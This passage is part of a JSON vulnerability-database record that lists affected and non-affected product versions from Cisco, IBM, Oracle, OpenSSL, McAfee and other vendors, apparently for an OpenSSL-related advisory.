"cisco", "version": null }, { "model": "webex meetings client on-premises t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dcm series d9900 digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.19" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.4" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.54" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "prime network services controller 1.01u", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.9.15.9.8" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.10" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1000v" }, { "model": "telepresence system tx1310", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3103204.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "project openssl 1.0.2h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "anyconnect secure mobility client for linux", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "telepresence system ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex business suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.5(3)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series blade switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-376.1" }, { "model": "jabber for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "telepresence profile series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1.0.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.10" }, { "model": "ace30 application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "edge digital media player 1.6rb5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.12" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "telepresence isdn gateway mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "wireless lan controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.4" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.3" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "telepresence system tx1310", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.33" }, { "model": "telepresence mx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0(1)" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "spa122 analog telephone adapter with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.23" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.7" }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "tandberg codian isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9.0" }, { "model": "digital media manager 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "ata series analog terminal adaptors", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptors", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "asr series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500021.2" }, { "model": "project openssl 1.0.1t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-37" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.7" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "broadband access center telco and wireless", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.19" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.25" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "webex meetings server multimedia platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified ip conference phone 10.3.1sr4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.3.5" }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "series stackable managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.11" }, { "model": "prime optical", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2(2)" }, { "model": "series stackable", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "aironet series access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "27000" }, { "model": "onepk all-in-one virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "11" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "13006.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11006.1" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "telepresence sx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "project openssl 1.0.1u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nac appliance clean access server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.0.1" }, { "model": "webex meetings for windows phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime optical for service providers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.11" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "edge digital media player 1.2rb1.0.3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "340" }, { "model": "network performance analysis", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.19" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.55" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings for windows phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "82.8" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.7" }, { "model": "telepresence integrator c series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "agent desktop", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "content security management appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.140" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.8" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.14" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "jabber client framework components", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "telepresence system tx9000", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "unified sip proxy software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1.4.7895" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "mobility services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "telepresence server and mse", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "701087104.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "ucs series and series fabric interconnects", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "620063000" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.3.0" }, { "model": "netflow generation appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1(1)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.6" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.3-6513" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.28" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.9" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.29" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "spa51x ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.8.15.7.15" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.3.0" }, { "model": "prime infrastructure", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "9.1" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.23" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3103200" }, { "model": "small business series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.24" }, { "model": "content security appliance update servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "videoscape anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.7.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.9" }, { "model": "universal small cell iuh", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.2" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.4" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-326.1" }, { "model": "unity express", "scope": "ne", "trust": 0.3, 